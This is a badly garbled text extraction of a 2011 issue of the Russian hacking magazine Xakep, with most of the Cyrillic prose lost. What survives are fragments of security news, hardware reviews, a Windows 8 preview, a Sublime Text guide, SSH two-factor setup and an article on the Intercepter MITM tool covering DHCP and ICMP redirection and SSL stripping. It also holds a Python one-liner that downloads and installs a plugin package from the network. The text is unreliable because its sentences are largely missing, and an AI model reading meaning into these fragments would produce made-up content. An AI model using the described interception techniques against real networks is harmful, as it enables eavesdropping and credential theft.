Хакер 2011 11 PDF

SSL:
072
036
x 11 (154) 2011
Android:

WWW.XAKEP.RU
11 (154) 2011
STEVEN PAUL JOBS (1955-2011)
: 210 .
024
: MYSQL
WINDOWS 8:
,

106
HASP-
062

154
MYSQL
,
,

.
056
Intro
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID PSYCHO
PHREAKING
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(naumkin@glc.ru)

: , ,
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

-

.: (495) 935-7034, : (495) 545-0906

TECHNOLOGY

, , , ,
, ,
,
.
, , , , , .
,
. ,
, . ,
98: -

.
,
.
, , ,
. SCADA-,
ERP, -- - 10%
.
nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine
11/154/ 2011
(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
(birarova@glc.ru)
( )
(tatarenkova@glc.ru)
(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011
001
Content
MEGANEWS
004
016
020
022
MALWARE
084
FERRUM
088
Super

IPS/MVA-
: Buffalo
NAS Buffalo

Gametrix True live sense
092
098
PCZONE
023
029
030
034
035
036
Windows 8: ?
Microsoft
WWW2
web-
Sublime Text 2, -

SSH
Proof-of-Concept
VNC- HTML5
C + MITM- = 0x4553-Intercepter
MITM- Windows
102
106
110
050
056
062
067
068
072
076
078

AntiHASP
HASP
DLL-
DLL
UNIXOID
114
!
VGA- FPGA
SYN/ACK
119
046

Dropbox: 25
SAP
sh2kerr

Linux-

how to ,

PHREAKING
040

AVG, Avast, ClamAV, Panda, Comodo: ,

:
?
Easy-Hack

MySQL ,

WordPress
-
hacker tweets
-
Iframe:

BEAST: SSL-
SSL/TLS-
X-Tools

XSS: - !
XSS-
124
129
134

GlusterFS

,

138
141
144
FAQ UNITED
FAQ
8.5
Dropbox:
>> coding
MEGANEWS
WINDOWS 8 DEVELOPER PREVIEW

,
12
500 000 .
IBM
DIGINOTAR

, DigiNotar

,

PKI-
PKIoverheid.

DigiNotar. Comodo. , DigiNotar,
, ,
, , . , 531 SSL
EVSSL , 247
. .
, Yahoo!, Google,
Mozilla, Microsoft ( Windows Update), Skype,
Facebook Twitter, , ,
(cia.gov), -6 (sis.gov.uk) (mossad.gov.il). ,
DigiNotar. , , DigiNotar
, DigiNotar,
,
. ,
DigiNotar, .
350 .
Angry Birds
Rovio Mobile.

300 . .
004
SAMSUNG

bada. .
MYSQL.COM.

:

Blackhole.
IBM

,
,
. , , .
-
, .
,
, ,
, , . ,
, 45- SOICMOS 256 .
262144 , 65536
. IBM ,
,
, ,
.
.
ELCOMSOFT

BLACKBERRY,
,
. 7-

.
PARALLELS
DESKTOP 7 MAC.

90 ,

.
11 /154/ 2011
MEGANEWS
DDOS- : $50.

Intel McAfee
DeepSAFE,
Intel. ,
. 22 IvyBridge
SMEP. SMEP
, ,
. SMEP

3 ,
.
,
Intel .
( 3, 2011) ,
. ,
SMEP DeepSAFE.
,
. ,
(www.giperdriver.ru/node/3)
,
.
][,
.

.

,
. , ,
iPhone , , .

, .
,
, , , .
50 , , .
, . ,
, ,
. , , , ,
:).
$40 000 FACEBOOK

,

.
$7 000,
6 .

16
.
006
20

-

iPhone 3GS
Pwn2own.
JAILBREAKME.COM,

Comex
Apple. .
20
LINUX. 1991 21-

Linux.
11 /154/ 2011
WEXLER.HOME 903

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .

. , , ,
.
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
11 /154/ 2011
07
MEGANEWS
51 , AngryBirds.
AMAZON
KINDLEFIRE !
KINDLE

Amazon. ,
, ,
, TechCrunch. ,
Android,
Amazon. , AndroidMarket
Amazon. , Amazon . ,
,
.
Amazon. Kindle Fire
:
, , .
Amazon . 7-
IPS- 1024 x 600 multi-touch. TI OMAP
(1 ) 8 .
Wi-Fi 802.11 b/g/n. 3G : , , WiFi . TechCrunch, WiFi+3G, , . ,
3G ? Kindle ,
, (- ),
KindleFire . ,

. Amazon
EC2
. , Amazon
Kindle Fire
. Amazon Silk. ,
Kindle.
$79! Amazon , www.shipito.com.
KindleFire, ,
15 , .
$199.
EKOPARTY
- Ekoparty
.

.
1000 ,
,
Ekoparty.
,
ESET, Immunity, CORE, Microsoft, Google, Intel TippingPoint.
,
,
64- Windows
, .
,
SSL BEAST.
: , 72 !
008
11 /154/ 2011
11 /154/ 2011
09
MEGANEWS
1 023 GOOGLE IBM. .
400
ADOBE FLASH
LINUX

,
GOOGLE

Adobe Flash (10.3.183.5),
13 , 12

Flash-.
? , , Google
,
- 400
(, ) .
, ,

Google. ,
. , ,
BlackHat 2011,
Sophos.
, Windows Vista
, ,
. , , Sophos
. ,
.
Adobe Flash. , Google
Flash- Chrome.
, Adobe - ,
. , Google
Adobe ,
. ,
Google, .
,
, 20.000 SWF. Flash 2000 CPU.
(),
.
, , ,
.. 400 ,
Flash-. Adobe
106 . , ,
80 .
?
Adobe :
CVE- , ,
Adobe, CVE
, (SPLC Adobe
Secure Product Lifecycle). Adobe CVE :

zero-day . , , CVE ,
, .
kernel.org 17 ! , .
.

, bittorrent.com utorrent.com. , Security Shield.
BitTorrent- .
-. kernel.org,
linuxfoundation.org linux.com.
root- , . , opensshserver openssh-clients,
. ,
linuxfoundation.org Linux.com. .
, .
Linux Foundation
.
, WORDPRESS
14.7%

WORDPRESS,
WORDPRESS.ORG
010
11 /154/ 2011
11 /154/ 2011
011
MEGANEWS
GOOGLE WALLET

,

. 13
25-
18 .
. , .

. 15
,

Facebook .
, . , Facebook
:
, .

, .
:
, , .
,
,
. : 18
5 .
,
.
,
.
Google
Google Wallet
,
,
Near Field Communication (NFC). Google Wallet

NFC- PIN-,
.
.
, Google Wallet ,
MasterCardPayPass, 150 . Google Wallet

MasterCard Citi Google PrepaidCard,

. Google Visa, American Express Discover.
:
Nexus S 4G.

NFC.

NFC
(NearFieldCommunication),

(
)
.

.

, 8
. , Royal Bank of
Scotland,
. ,

?
012
DOOM 3
23%

,
id Software
.

,

Nielsen.
11 /154/ 2011
3 . DIRT 3 AMD. AMD4u.com.
BIOS

BIOS
. 1999
CIH
BIOS
,

: BIOS
,

.
360 , , Trojan.Mebromi Symantec.

, ,
MBR - , , ,
, BIOS
.
Trojan.Bioskit.1 , :
, , . Trojan.Mebromi
, Windows 2000 (
Windows Vista), .
, . :
cbrom.exe, hook.rom, my.sys, flash.dll bios.sys. bios.sys
, BIOS Award,
MBR. bios.sys
Award BIOS, . Trojan.Mebromi -
, BIOS. , Icelord. 2007 :

Winflash Award BIOS
, BIOS
SMM (System Management Mode). SMM SMRAM
( BIOS ,
) . :
,
, , ..
BIOS cbrom.exe ( Phoenix Technologies), ,
, .
hook.rom ISA BIOS ROM.
Trojan.Mebromi
BIOS .
BIOS PCI Expansion ROM,
hook.rom. MBR . , Award BIOS
. ,
,
BIOS . ,
Trojan.Mebromi
, , ,
BIOS .
39%
iOS ANDROID

,

VIAFORENSICS
11 /154/ 2011
013
MEGANEWS
INTEL GOOGLE Android Intel.
SPYEYE ANDROID
TOR
TOR ,

F-Secure
, Man-in-the-Mobile SpyEye. ,
, ,
SMS- ,
Symbian. .
Trusteer
Spitmo, , Android-.
, Symbian:
, SpyEye,

-. SMS , ,
,
. Trusteer ,
,
, ,
.
,
, TAN-,
, Google Facebook,
.

Trusteer,
Zeus SpyEye

.
72%
1.6

,
.

,
Tor.
,

Tor, .
, : ,
, Tor,
.
? Tor ,
- https,
.

Tor, SSL-: ,
.
,
,
.
HTC.
,
webOS,
Palm
HP.

52% .
:
34%,
81%.

Facebook.
,

.
014
15%
FACEBOOK
LIKEJACKING.

Like! .
DDOS!
23% DDoS ,

.
11 /154/ 2011
SKYPE . App Directory 30 .
WEXLER

EDIFIER R1200T

Edifier

Edifier R1200T .
.
, Edifier R1200T , (140 x 240 x 183 ),

. ,
. R1200T .
,
, , .
.
R1200T
. . /- 106 , 72 ;

52 20000 . 28
RMS, 25 .
, Edifier R1200T ,
, . ,
R1200T
2.0.
2 200 .

,
. , ,
,
:). Wexler

WEXLER.BOOK Flex ONE, 6"
E-ink .
.
,
, ! ,

.
, . , .
1241397,5 , 200 .
WEXLER.BOOK Flex ONE
8 , 40
MicroSD. (TXT / PDF/ DOC / CHM
/ HTM / HTML / EPUB / FB2), (JPG / JPEG / BMP
/ GIF / PNG) (MP3).
.
. 7.990 .

.

Readius,

2010 ,
.
,

OLED
Sony.
WINSTON XSTYLE WINSTON

Winston Winston XStyle:
,
.
LSS * Winston
11 /154/ 2011
XS
. Winston XStyle LSS:
.
*
LSS .
015
FERRUM

SUPER

IPS/MVA-
:

!

. ,

!
Dell UltraSharp U2711
? .
, PC - 10-12 ,
3-5 .
,
8-10
30 (, , ). ,
1-2 . ,

140000 , 5834 16 .
,
68.84 . ,
23.24%
: .

. , ,
CAD-, ,
,
. ,
TN-
. -
IPS (SFT) MVA.
iiyama ProLite X2472HD-1
, ,
LG IPS236V
. IPS (In-Plane
Switching) SFT (Super Fine TFT)
Hitachi NEC (). ,
- ).

, ,
. ,

:
Apple LED Cinema Display
ASUS PA246Q
NEC MultiSync EA232WMi

ViewSonic VP2365wb
016
RGB 24 . IPS- .

, ,

.
, , TN IPS .
TFT TN ,
IPS .
.
H-IPS (Horizontal), E-IPS (Enhanced) P-IPS
(Professional).
,
Advanced True White, .
. ,
P-IPS 1.07
30- .

MVA (Multi-domain Vertical
Alignment), Fujitsu,
TN IPS.

, ,
RCT, .
IPS
,
.
, , ,
, IPS-.
MVA- iiyama ProLite X2472HD-1
.
11 /154/ 2011
Super
! , ,
. (
)
. IPS-
, ,

, VESA.
. TFTtest
.
Pixel Persistence Analyzer

. , IPS : -

.
,
DataColor Spyder3 Elite,
( ,
45 60
) .

RGB-.
, .
. .

.
,
sRGB.
IPS- .
P-IPS-
Adobe RGB.
APPLE LED CINEMA DISPLAY

Apple .
, -
.
! ,
Apple LED Cinema Display . ,
.
Apple, . -, ,
, . : , , -,
Mini DisplayPort Apple LED Cinema Display PC
. ,
USB-
.
.
40 000
.
ASUS PA246Q
ASUS PA246Q
24 (
27- ), .
,
. , !
, . . .
: , .
, ASUS PA246Q
( , , Mini
DisplayPort), USB 7 . , .
ASUS PA246Q P-IPS. , , 1.07
30- .
18 000
.
11 /154/ 2011
017
FERRUM
DELL ULTRASHARP U2711

Dell UltraSharp U2711 . . , , , Apple.
. .
-
- .
Dell UltraSharp U2711
, 27- . , 90
.
. USB- - 8
. ,
.
DVI, D-Sub, HDMI, DisplayPort USB.
, , ,
.
28 000
.
IIYAMA PROLITE X2472HD-1

, ,
, . iiyama
ProLite X2472HD-1 VA-. , MVA.
, . .
.
, .
. !
. -
, . - (
) .
, .
,
BX2472HD . D-Sub, DVI HDMI, iiyama ProLite X2472HD-1
.
10 000
.
Apple LED Cinema

Display
:
, :
/:
:
:
:
:
I/O:
IPS
27, 2560x1440
178/178
16.7
1000:1
12
490650201
Mini DisplayPort, 3x USB 2.0
10.7
018
ASUS PA246Q
IPS
24.1, 1920x1200
178/178
1073.7
1000:1
6
559381235
1x D-Sub, 1x DVI, 1x HDMI, 1x DisplayPort, 3x USB
2.0, -
7.3
Dell UltraSharp
U2711
IPS
27, 2560x1440
178/178
1073.7
1000:1
6
647428200
1x D-Sub, 2x DVI, 1x HDMI, 1x DisplayPort, 5x USB
2.0, -
7.7
11 /154/ 2011
Super
NEC MULTISYNC EA232WMI

NEC MultiSync EA232WMi
. , .
, .

.
. .
, , 5 USB.

. NEC MultiSync
EA232WMi - , ECO Mode . . , . ,

? , , NEC,
.
14 000
.
VIEWSONIC VP2365WB

ViewSonic. ,
. ,
: IPS-
.
VP2365wb
NEC MultiSync EA232WMi. .
, ,
, , .

. /
.
, ,
ViewSonic USB .
4 : ,
. : D-Sub
DVI , , .
.
10 000
.

iiyama ProLite
X2472HD-1
MVA
24, 1920x1080
178/178
16.7
3000:1
8
570420179
1x D-Sub, 1x DVI, 1x HDMI
3.6
11 /154/ 2011
NEC MultiSync
EA232WMi
IPS
23, 1920x1080
178/178
16.7
1000:1
14
550379220
1x mini D-Sub, 1x DVI, 1x DisplayPort,
5x USB 2.0
7.5
ViewSonic
VP2365wb
IPS
23, 1920x1080
178/178
16.7
1000:1
5
548434250
1x D-Sub, 1x DVI, 4x USB 2.0
6.8
Dell
UltraSharp U2711. 60 ( ).

.
30000 ,
IPS-, ?
ASUS
PA246Q. , ,
. z
019
FERRUM
: BUFFALO
Buffalo
.
,

. Buffalo
, , ,
.
LINKSTATION PRO
Microsoft. ,
Buffalo , ,
. ,
3 ,
. ,
, NAS
, DLNA UPnP. ,

-, USB-.
: 1 SATA-II
:
1, 2, 3
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0
:
SMB/CIFS, AFP, FTP, HTTP,
HTTPS (WebAccess), NTP
:
17 / . 24
: 45 x 156 x 175
: 1.1
LINKSTATION DUO
,

.
,
6 ,
. , Apple TimeMachine
, . WebAccess iPhone Android,
, .
020
: 2 SATA-II
: 2, 4, 6

RAID: 0, 1 Standard
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0
: SMB/CIFS, AFP,
FTP/FTPS, SFTP, HTTP, HTTPS
(WebAccess), NTP, Kerberos
:
26
: 86 x 204 x 127
: 2.3
11 /154/ 2011
: BUFFALO
LINKSTATION PRO DUO

Pro Duo
Linkstation Duo. ,
74 /,
600 /, ,
BDRip'.
6 : ,

. ,
24 .
: 2 SATA-II
: 2, 4, 6

RAID: 0, 1 Standard
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0
: SMB/CIFS, AFP,
FTP, HTTP, HTTPS (WebAccess), NTP, Kerberos
: 17
/ 24 Max
: 86 x 204 x 127
: 1.7
LINKSTATION PRO QUAD

,
3
.
, 12
, , DLNA UPnP-,
-, iTunes- -----.
, .
, , RAID- 0, 1, 5, 10
JBOD.
web-, .
: 4 SATA-II
: 4, 8, 12

RAID: 0, 1, 5, 10 JBOD
: Ethernet
10/100/1000 Mbps, 2 x USB 2.0
: AppleTalk, SMB/
CIFS, AFP, FTP, HTTP, NTP,
Kerberos
:
43
: 149 x 233 x 154
: 5.5
LINKSTATION MINI
: 2 SATA-II
: 1, 2

RAID: 0, 1, JBOD
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0
: AppleTalk, SMB/
CIFS, AFP, FTP, HTTP, LDAP
:
17
: 82 x 40 x 135
: 0.5
11 /154/ 2011
NAS?,
Buffalo
- 2,5 .
- : , .
,
, ,
.
NAS , iTunes, DLNA
BitTorrent-. , ,
web-.
, ,
- .

, .
021
FERRUM
GAMETRIX TRUE LIVE SENSE
:
: /
: 6
: USB, 3.5
: ,
, USB
4500
.
022
15, 120. , , ! ,
?
? ,

.
3D- , ,
, .

.

,
Gametrix
True live sense.
:
, . , , ?
Gametrix
, ,
, , .
( ), ().
,
.
, .
, .
.

USB, .
,
.
,
(
Satisfaction).

,
.

?
- World
of Tanks ( ) WoT .
,

.

Gametrix True live sense
,
.
,
.
, ,
, .
Gametrix, ,
. , , ,
-.
.
.

.

, .
Gametrix
.
, ,
. ,
. ,
Gametrix . . . z
11 /154/ 2011
Preview
32 .
PC_ZONE .
72
SSL-
2004 .
SSL 3.0 TLS 1.0.
,
.

. BEAST
2
PayPal,
. ,
-

,
, .
PC ZONE
24
WINDOWS 8:
Microsoft

. Windows 8
.
30
SUBLIME TEXT 2, -

?
,
.
36
0X4553-INTERCEPTER
Windows
MITM, ,
SSL.
56

,
MySQL
, .
11 /154/ 2011
68
IFRAME:
,
iframe, . ?
78
XSS: -
10 XSS-, 6
, 4 .
023
PC ZONE

MICROSOFT
Microsoft, ,
,
Windows 7,
Windows 8
. ,
,
Windows 8 Developer Preview .
WWW

Windows 8:
bit.ly/mXPxyQ
,
Metro UI:
bit.ly/nNzaN8
WARNING

Windows 8:
bit.ly/mXPxyQ
,
Metro UI:
bit.ly/nNzaN8
Windows 8:
?
WINDOWS 8
, , Microsoft
Windows .
, ,
Metro UI, ,
.
, .
: Metro-
Windows
. :
, . ,
, . , ,
Windows 8 . BUILD,
Developer Preview, ,
ARM.
METRO UI
024
Metro UI ,
. , , .
,
Home Screen',
- Windows Phone.
, -. , , ,
, .
, .
(, RSS- )
( ,
Win).
, . ,
.
11 /154/ 2011
Windows 8: ?
Metro UI
, . .
Win + M. Start, Metro UI.
, , . MSDN (http://bit.
ly/r0SCC4) , 1992
Start,
Windows 3.x,
Windows .
,
. :
Windows 7 11% , Windows
Vista.
, . ,
.
Start Metro UI,
.
,
, (,

, ), ,
.
.
Metro UI .
, , Windows
BSOD
.
, Metro UI,
Start. , Desktop, ...
. :). , Metro
UI ,
Youtube'.
11 /154/ 2011
025
PC ZONE
?
, , Windows 8,
. ,
. Microsoft
Windows 8. ,
. Windows 7 SP1 404
32 , Windows 8 271
29 . Lifehacker.com
(lifehac.kr/oA2pOP)
: Core i7 3.8 6
, 2 Nvidia GeForce
9800 GT. .

Windows 8
Windows 7
0:10
0:35
(~700)
0:29
0:32
( ~700 )
0:11
0:12
Handbrake
8:06
8:15
0:46
0:46
10 Chrome
0:07
0:07
3dmark10
6470
6455
,
. 3.5 (
).
, ,
. , :).
8 ,
, ( MultiMonitor TaskBar).
dual monitor . ,
Windows 8 . Metro Microsoft
. BSOD.
Blue screen of death. , , , ,
:).
, HAL_
INITIALIZATION_FAILED.
WINDOWS EXPLORER
,
Windows Explorer.
Ribbon-, Office 2007/2011.
.
, ,
Manage
. , , ISO-
(, UltraISO). File.

, .
/ . , ,
. , ,
. ,
.
, .
, .
026
, Windows 8 -.
, .
,
, ,
.
End
Task. Metro-,
suspended ( ,

11 /154/ 2011
Windows 8: ?
WINDOWS 8

,
:
1. .
, ,
... .

,
.
2. Dual-boot.
Windows 8 , ,
, . (
).
.
, .
Windows 7
. VHD (Virtual Hard Drive
Files). ,
.vhd-. ,

,
. .
1. ,
. , 60 .
, BSOD.
2.
Windows 8 Developer Preview.

. ,

Microsoft Windows 7 USB/DVD download
tool (bit.ly/nYylp9).
3.
, .
diskpart:
. :

, .

.
, ,
,
,
VHD-. .
, :).
4. ,
. Custom,
.
.
.
.
!
(Shift + F10),
diskpart
VHD-:
,
DVD. :
1. VHD-;
2. .
3. ,
( F8)
. VHD .
diskpart:
DISKPART> select vdisk file="d:\Virtual Machines\Win8.vhd"

DISKPART> attach vdisk
DISKPART> select vdisk file=d:\VMs\

Win8.vhd
DISKPART> attach vdisk
C:\Windows\system32>diskpart
Microsoft DiskPart 6.1.7601
: THISISSTATION
DISKPART>
create vdisk file="d:\Virtual Machines\Win8.vhd" type=expandable
maximum=60000
( ): 100

DiskPart.
11 /154/ 2011
<ALT-TAB>

. , .
,
.
!
.
5.

w ! ,
- (,
notepad) ,
(, d: f:).
4. : f:\setup.
f: VHD.
5. , Custom. , ,
.
,
VHD? :)
027
PC ZONE

! :) Windows 8
: ,
HTML5 + Javascript.
WinRT
Win32. API
, Win32 API.
Win32,
. :
Metro;
UI (
Win32);
API ;
API SandBox' (
WinRT , ,
, ).
,
. , ,
,
, . .
LOCK SCREEN
lock- .

. : ,
. ,
. ,
PIN, , ,
.
, ? :)
Windows Live ID, . , Sync
PC Settings. , Windows 8, Windows
Live ID. ,
Windows
Live. , ,
, .
, ,
SkyDrive.
). -.
More details, , ,
-, . ,
Processes :
. , ,

. ,
, :).
, ... (, !).
Performance
Metro UI, . App
History: . (, ). ,
,
( -
). Startup
028
,
,
, . , Windows 8 , .
, -.
, :
Metro UI . ,
Microsoft . Windows App Store
Developer Preview. , , ,
, .
, .
,
(-, ).
Refresh Your PC
.
?, ,
refresh- ,
. z
11 /154/ 2011
WWW2
CODECADEMY
www.codecademy.com
, - , ,
. ,
- .
Codecademy ( ) ,
( JavaScript).
.
, : .
, .
- Foursquare.

SHOWMEDO
showmedo.com
(!) , .
,
. ( peepcode.com destroyallsoftware.com),
,
- .
, . ,
. ShowMeDo , , 100% . Python:
600 .

SECURITYTUBE
www.securitytube.net
,
SecurityTube. , , . , ,
, Metasploit. .
,
, , , X-Toolz PoC'.
, , . ,
, VisualHack++ :).
-
ASCIIFLOW
www.asciiflow.com
. , -,
, , Visio. Ascii-. Ascii art.
, , -.
. , . Ascii-? :). Ditaa!,
.
-
11 /154/ 2011
029
PC ZONE
Step (twitter.com/stepah)
Sublime Text 2,
-

, Windows Notepad++, Linux gedit,
Mac
TextMate.
: Sublime Text 2.
,
-
.
Sublime Text 2. Mac
WWW

Sublime Text:
www.sublimetext.
com/forum
:
wbond.net/sublime_
packages
Sublime Text 2 ,
. TextMate,

Mac, . : Duke
Nukem Forever ,
TextMate. Sublime Text, ,
. : , , , . ,
- ,
, ,
. ,
Mac, .
-.
-
, Sublime Text , Windows, OS X Linux . , ,
(
?). -
, .
, Sublime Python'!
Ctrl-` (),
Python-. Python
: API,
. Python
. , , . , Sublime :
, , $59
?. .

Sublime , .
. ,
,
. . (-), -
030
11 /154/ 2011
Sublime Text 2, -
.
Chrome.
, Notepad++.

, ,
.
, TextMate.
- ,
.
, ,
. ,
HTML-
JavaScript, .
: C, C++, C#,
CSS, D, Erlang, HTML, Groovy, Haskell, HTML, Java, JavaScript, LaTeX,
Lisp, Lua, Markdown, Matlab, OCaml, Perl, PHP, Python, R, Ruby, SQL, TCL,
Textile XML.
.
-
Sublime,
-. , - , ,
, 10 000 .
,
. ,
. , . Sublime
. - : ?

: pastebin.com/raw.php?i=7356r0ZM :). -, ,
, , , -
. , ?

, ,
: , Distration Free Mode (Shift + F11).
.
Sublime Text .
, ,
, - .
, (View Layout) .

.
Soda

Textmate, Sublime Text . , Tools
Ctrl + Shift + P ( Mac: Shift + Command + P). ,
, ,
(, ),
Command Palette. ,
(,
Try/Except) Sublime . 5 33 ,
. , , :
py- , Python.
GO ANYTHING
, , Go Anything. :
. Ctrl
+ P (Mac: Command + P). .
, . ,
, .
, , 50
000 ! 10 ?
":10". "#"
. Sublime
.
(, , ).
"@". ,
(,
Ctrl + R).
.
, . , tp@rf, read_file text_parser.py, tp:100
100- !
, Sublime Text ,
.
11 /154/ 2011
. , 10 , 10 .
. ,
,
.
Alt ( Command Mac')
031
PC ZONE
, . Shift + Ctrl/Command + L
. , ( ,
..)
Control/Command + D.
. .
Alt + F3 Ctrl+Command+G .

.
. ,
, . .
Edit,
. ,
. C++
Alt-O (File-Swap Header/
Implementation). , . , : D, Erlang, Haskell, JavaC, Make, Python, Ruby.

(, , Python').
,
.
, ,
Sublime Text.
Sublime',
. (, ),
.
Sublime Package Control, (, Python-)
:
import urllib2,os;pf='Package Control.sublime-package';
ipp=sublime.installed_packages_path();os.makedirs(ipp)
if not os.path.exists(ipp) else None;
open(os.path.join(ipp,pf),'wb').write(urllib2.urlopen(
'http://sublime.wbond.net/'+pf.replace(' ','%20')).read())

Preferences Package control.
SUBLIME TEXT
SublimeCodeIntel
bit.ly/p5LzZE
,
Sublime ,
. , Code
Intelligence Komodo
Editor.
,
,
.
032
sublime-text-2-git
bit.ly/rfna5O
Sublime
.
, .

Git.
SVN,
Mercurial.
Clipboard history
bit.ly/rqtKEu
,
Sublime Text
( Ditto),
.

,
Sublime Text
(Ctrl + C).
Mote
bit.ly/mPIeAO
sftp/
ssh2,
. ,
PuTTY
,
.
11 /154/ 2011
Sublime Text 2, -

Sublime Text
,
Windows 1252. ,
,
(File Reopen with encoding Windows 1251), .
Sublime
Windows 1252, Windows 1251.

(Preferences File settings Default).
:
"fallback_encoding": "Western (Windows

1252)",
, , :
"fallback_encoding": "Cyrillic (Windows
1251)",
Vi',
Vintage Mode.
vi
Sublime Text', . ,
. ,
Preferences Global Settings Default
menu item Vinate
( ),
:
"ignored_packages": ["Vintage"]
//
"ignored_packages": []
//
Sublime. ESC.
-
INSERT MODE, , :).
, Sublime Text .
,
, , -
,
Soda ( ).
1. .zip- GitHub- (bit.ly/nIMqT7)
2. Theme
Soda Packages
Sublime Text.
3. , (Preferences User Global Settings).
: (Soda Light.
sublime-theme) (Soda Dark.
sublime-theme),
:
{
"theme": "Soda Light.sublime-theme"
}
Python .
Install packet, , .
.
ZEN CODING
, ,
Zen Coding.
HTML CSS , .

, . .
div#page>div.logo+ul#navigation>li*3>a
,
(ctrl+space, ) :
<div id="page">
<div class="logo"></div>
<ul id="navigation">
<li><a href=""></a></li>
</ul>
</div>
(bit.ly/pEAGgU), . : bit.ly/pipb3U. ,
, , .
11 /154/ 2011
, . ,
.
, ... .
, Goto Anything. . -
? ( ). ,
, . ? :).
,
( ). , ( ) , , .
Sublime Text
. . - ,
153- , .
: , - ? ,
. .
Sublime Text.
,
-. . .
,
(, , TextMate).
, ,
.
. TextMate' ,
. , Sublime ,

.
, ,
Go To Anything, zencoding. . z
033
PC ZONE
SSH
Gmail.
: Hdfk^j2. ,
, .
,
Google-. GMail .
,
SSH-.
, . ,

.
Google Authenticator (
iPhone, Android, BlackBerry) , -
Google. ,
. ,
, -
(, ,
:).
, Google .
,
OATH (Initiative for Open Authentication),
( Symantec VeriSign).
: , Google , .
(PAM) ,
, OpenSSH.
1. PAM- Google Code :

hg clone https://google-authenticator.googlecode.com/
hg/ google-authenticator/
PAM-
034
QR-
2. :
cd google-authenticator/libpam/
$ sudo make
,
Makefile ( : bit.ly/q7aysJ).
3. pam_google_authenticator.so /lib/security/,
google-authenticator /usr/bin.
4. /etc/pam.d/sshd, SSH- PAM-:
auth required pam_google_authenticator.so
/etc/ssh/sshd_config:
ChallengeResponseAuthentication yes
5. , . , :
$ google-authenticator
https://www.google.com/chart?chs=200x200&..FBPWIL6PRYLVBQ
Your new secret key is: YOFBPWIL6PRYLVBQ
6. . QR, Google
Authenticator, , ,
. , - Google ( , ).
7. SSHD, , ,
! z
11 /154/ 2011
Proof-of-Concept
VNC- HTML5
,
,
: ?
,
- Java Flash.
noVNC . VNC-,
HTML5 (WebSockets + Canvas).
WebSockets, websocket-js WebSockets, Adobe Flash.

Javascript Engine.
JS-,
RFB.
Chrome
Firefox, Native
WebSockets.
VNC (Virtual Network Computing)

.

RFB (remote framebuffer). Intel
Intel KVM,

. VNC- ,
. , .
noVNC (kanaka.github.com/noVNC)

noVNC ,
,
, .
, . , -,
Display (include/display.js),
HTML5 canvas, -, RFB (include/rfb.js),

RFB, , -, Websock (include/
network.js),
Native WebSockets
Flash Websocket
.

HTML5. ,

, , .
noVNC HTML5,
.
:
HTML5 Canvas ( createImageData).
HTML5 WebSockets. ,

?
, VNC-
WebSockets
( x11vnc/libvncserver),
-
WebSockets2TCP. ,
, Python,
( websockify) , ,
SSL/TLS- (
"wss://").
, mini-webserver,
,
WebSockets-.
VNC-:
./utils/launch.sh --vnc localhost:5901
noVNC , HTML5
11 /154/ 2011
URL,
. Connect
.

VNC-. z
035
PC ZONE
, 0x4553-Intercepter
,
2008 .

MITM-.
,
SSL.
Ares (intercepter.nerf.ru)
MITM-
WINDOWS
C + MITM- =
0x4553-Intercepter
036
11 /154/ 2011
0x4553-Intercepter
INTERCEPTER?

Windows . . .
unix' iptables,

, , , . , NAT ( ip forwarder)
- .
Windows , ,
proof of concept . , , unix
- Intercepter. ettercap unix
: arp-, , sslstrip .
- . , unix,
,
GUI-, . Intercepter
. ,
SSL MITM SSL Strip ,
,
MITM': ARP, ICMP, DNS over
ICMP, DHCP.
IP- MAC-, , .
(PDF-
),
, 0x4553-Intercepter.

Intercepter .
- MITM-
11 /154/ 2011
. 0.8 Intercepter
0x4553-NAT. NAT, ,
.
ethernet PPPoE- ADSL-
FTP-.
DHCP DHCP MITM. , , , .
1. ICMP Redirect MITM.
, .
2. DNS over ICMP MITM. ,
ICMP Redirect. DNS, ,
DNS.
3. SSL MITM. , ,
SSL ( SSLv2, SSLv3, TLSv1).
4. SSL Strip. Windows.
sslstrip unix.
,
DHCP MITM, .
DHCP MITM
.
DHCP-.
. ,
DHCP Discovery, IP-
, .
DHCP Offer,
037
PC ZONE
.
NAT . , ettercap,
0x4553-Intercepter.
:
1.
IP-.
DHCP-.
2. DHCP-.
3. , .
.
1. , , .
0x4553-NAT,
.
2. , DHCP-
Intercepter WinPcap .
DHCP- Windows Server 2003, tftpd32 DHCP-, ADSL-. , DHCP Intercepter
,
.
3. , DHCP- - . .
.
, - ,
IP-. gratuitous arp.
, DHCP Discovery
.
, , IP . ,
Intercepter gratuitous arp , , ,
. Sniffing
dhcp based network.
